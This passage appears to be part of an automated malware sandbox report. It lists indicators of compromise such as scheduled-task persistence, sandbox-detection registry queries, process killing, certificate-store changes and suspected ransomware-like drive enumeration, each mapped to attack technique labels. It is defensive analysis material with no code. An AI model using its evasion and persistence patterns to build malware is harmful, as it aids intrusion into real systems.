File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Tasks\JWccChrZepOVqMLId.job	svchost.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI1FA1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI47AA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI498F.tmp	msiexec.exe
File created	C:\Windows\Tasks\JWccChrZepOVqMLId.job	schtasks.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\Tasks\TXAwOSJqerYTzUX.job	schtasks.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
4888	4452	WerFault.exe	95
4512	1868	WerFault.exe	108
2384	3548	WerFault.exe	123
2128	1868	WerFault.exe	108
3048	4452	WerFault.exe	95
1788	1868	WerFault.exe	108
4728	4452	WerFault.exe	95
5484	4452	WerFault.exe	95
5356	1868	WerFault.exe	108
5720	1868	WerFault.exe	108
5980	5208	WerFault.exe	142
6040	1868	WerFault.exe	108
2748	1868	WerFault.exe	108
5300	4452	WerFault.exe	95
5036	4452	WerFault.exe	95
2972	4452	WerFault.exe	95

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun05532f7abc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	stgbdvv

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun05ac1b0207d3ff3b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun05ac1b0207d3ff3b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6604	schtasks.exe
2228	schtasks.exe
6912	schtasks.exe
2592	schtasks.exe
6312	schtasks.exe
6356	schtasks.exe
7456	schtasks.exe
1036	schtasks.exe
1844	schtasks.exe
3748	schtasks.exe
7024	schtasks.exe
3348	schtasks.exe
6508	schtasks.exe
8068	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6696	timeout.exe
6232	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4224	taskkill.exe
2656	taskkill.exe
7584	taskkill.exe
5592	taskkill.exe
5360	taskkill.exe
5684	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	mqQpCvn.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	mqQpCvn.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	UbmPrUN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	UbmPrUN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	UbmPrUN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\ = "SyncingOverlayHandler2 Class"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "180"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LOCALSERVER32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\ = "ShareHandler Class"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ = "IDeleteLibraryCallback"	OneDriveSetup.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "6;18;22"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ = "IFileSyncClient5"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ = "IIsMappingValidCallback"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.mcafee.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy\CurVer	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "436;41c;401;801;c01;1001;1401;1801;1c01;2001;2401;2801;2c01;3001;3401;3801;3c01;4001;42b;42c;82c;42d;423;402;455;403;c04;1004;1404;41a;405;406;465;413;813;809;c09;1009;1409;1809;1c09;2009;2409;2809;2c09;3009;3409;425;438;429;40b;80c;c0c;100c;140c;180c;456;437;807;c07;1007;1407;408;447;40d;439;40e;40f;421;410;810;44b;457;412;812;440;426;427;827;42f;43e;83e;44e;450;414;814;415;416;816;446;418;419;44f;c1a;81a;41b;424;80a;100a;140a;180a;1c0a;200a;240a;280a;2c0a;300a;340a;380a;3c0a;400a;440a;480a;4c0a;500a;430;441;41d;81d;45a;449;444;44a;41e;41f;422;420;820;443;843;42a;540a"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\VERSIONINDEPENDENTPROGID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging\CLSID\ = "{917E8742-AA3B-7318-FA12-10485FB322A2}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "183"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\ProgID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\TYPELIB\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\HELPDIR	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{9D613F8A-B30E-4938-8490-CB5677701EBF}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ProgID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
